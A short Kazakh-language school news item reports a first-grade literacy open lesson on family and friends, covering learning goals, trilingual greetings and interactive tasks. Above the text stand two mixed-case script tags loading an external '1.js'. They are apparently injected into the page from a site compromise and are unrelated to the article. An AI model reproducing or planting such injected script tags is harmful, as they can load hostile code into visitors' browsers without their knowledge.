<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
07.03.2018
Ғ.Әбдірахманұлы атындағы Қима орта мектебінде бастауыш сыныптар бірлестігі онкүндігінің аясында өткен "Менің отбасым және достарым" тақырыбында 1 сыныпта сауат ашу пәнінен 02.03.18 ж. күні ашық сабақ өтті. Осы сабақта қол жеткізілетін оқу мақсаттары: Тыңдалған материал бойынша өз пікірін айту. Берілген тақырыпқа әңгіме құрап айту. Сөздерді, дыбыстарды орфоэпиялық нормаларға сәйкес дұрыс айту. Сабағымның мақсаты: Барлығы: Жаңа білімді меңгереді. Көбі: Тақырыпты түсініп, тыңдап, жетекші сұрақтар арқылы талқылайды. Кейбірі: Алған білімді өмірде қолдана алады. Сабақ үш тілде амандасу арқылы басталды. Шаттық шеңберге тұрып достық туралы өлең жолдары айтылды. Жетістік критерийлері бойынша отбасы мүшелерін үш тілде дұрыс қайталай алады. Интербелсенді тақтамен тапсырмалар берілді. Оқушылар әріп элементтерін дұрыс байланыстыра отырып, суретті сөйлеммен дұрыс байланыстырып жазды. Дыбыстық талдау жасап, сабақ соңында кері байланыс парағын бояды.

